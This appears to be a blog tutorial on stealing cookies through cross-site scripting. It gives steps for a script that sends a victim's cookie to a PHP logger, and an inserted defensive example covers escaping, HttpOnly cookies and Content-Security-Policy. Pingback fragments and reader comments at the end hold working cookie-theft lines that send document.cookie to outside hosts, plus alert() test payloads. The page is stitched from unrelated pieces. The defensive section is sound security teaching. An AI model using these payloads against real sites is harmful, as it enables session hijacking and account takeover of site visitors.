Note:
This tutorial shows how the attack is done so that you know how it works, can secure your site, and can make sure it does not happen to you!
About:
XSS (cross-site scripting) is done by people injecting code into a website so that it runs on the webpage when a user performs a specific event. Typically, people attempt to steal cookies in this manner, and this is all I'm going to show, but other things can be stolen, and other code could be run through a JavaScript file.
How To:
- Create your JavaScript file, xss.js. An example is here; it connects to your grabcookie.php file and includes the user's cookie in the URL.
- You obviously need your grabcookie.php file. Your grabcookie.php file is what saves the cookie. You can view my code here, which uses GET to retrieve the cookie from the URL. It then combines the cookie with other items, formats them, and appends them to the current log file, cookiejar.php.
- Now how are the cookies accessed? Simple. Connect to your webpage at "http://www.site.com/cookies/cookiejar.php". This is where all the cookies are saved.
- Now you just need to find an exploit in the site that requests the .js (JavaScript) file, which then runs its code. A list of some exploits can be found on this site: "http://ha.ckers.org/xss.html". Of course, there are many others too, but that would be a start for you. A great web page scanner for you to check out is Acunetix Web Vulnerability Scanner 4. It scans the webpage for many exploits and bugs. Scan your site and then fix the bugs to prevent any XSS attacks on your site.
This has been a tutorial from Venom
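The defensive counterpart to the steps above, as an added example that is not part of the original tutorial: it escapes untrusted text on output, keeps the session cookie out of `document.cookie`, and restricts where scripts and images may load from. The function names, the `sid` cookie name and the sample comment are assumptions constructed for illustration.

```javascript
// Added defensive example; names, cookie name and sample values are constructed.

// 1. Output encoding: untrusted text is escaped before it is placed in HTML,
//    so an injected <script src=...> tag is displayed as text, not executed.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// 2. Session cookie flags: HttpOnly keeps the cookie out of document.cookie,
//    Secure limits it to HTTPS, SameSite limits cross-site sending.
function sessionCookieHeader(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name) || !/^[A-Za-z0-9._~-]+$/.test(value)) {
    throw new Error("unexpected characters in cookie name or value");
  }
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// 3. Content-Security-Policy: scripts and images may only load from the site
//    itself, which blocks both an external .js file and an image request
//    to another host.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'; base-uri 'none'";
}

// Render a visitor comment with all three layers applied.
function renderComment(commentText, sessionId) {
  return {
    headers: {
      "Content-Type": "text/html; charset=utf-8",
      "Content-Security-Policy": cspHeader(),
      "Set-Cookie": sessionCookieHeader("sid", sessionId),
    },
    body: `<p class="comment">${escapeHtml(commentText)}</p>`,
  };
}

// Constructed input: a comment that tries to pull in an external script.
const sample = renderComment('<script src="http://attacker.example/xss.js"></script>', "abc123");
console.log(sample.headers["Set-Cookie"]);
console.log(sample.body);
```

`escapeHtml` covers HTML element content and quoted attribute values only; untrusted data placed in URLs, inline scripts or style blocks needs encoding specific to that context.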
[...] him log into your account. BTW it's patched now. If you're interested, he wrote a tutorial before: Tutorial Ninjas » Blog Archive » Cross Site Scripting (XSS). Note: The two links above (tiny url and the tut.js) have http replaced with hxxp when you click on [...]
[...] main use of this is in combination with an XSS attack to login as the victim. This is a very simple thing to do just [...]
var i=new Image();
i.src = ” http://www.shamim.starhostbd.com/grabcookie.php?cookie=“+document.cookie
var i=new Image();
i.src = “http://www.shamim.starhostbd.com/grabcookie.php?cookie=”+document.cookie
var i=new Image();i.src = “http://myserver.com/myfolders/grabcookie.php?cookie=”+document.cookie;
alert(”t0pP8uZz”)
alert(”t0pP8uZz”);
alert(”/t0pP8uZz”/)
var var = 1; alert(var)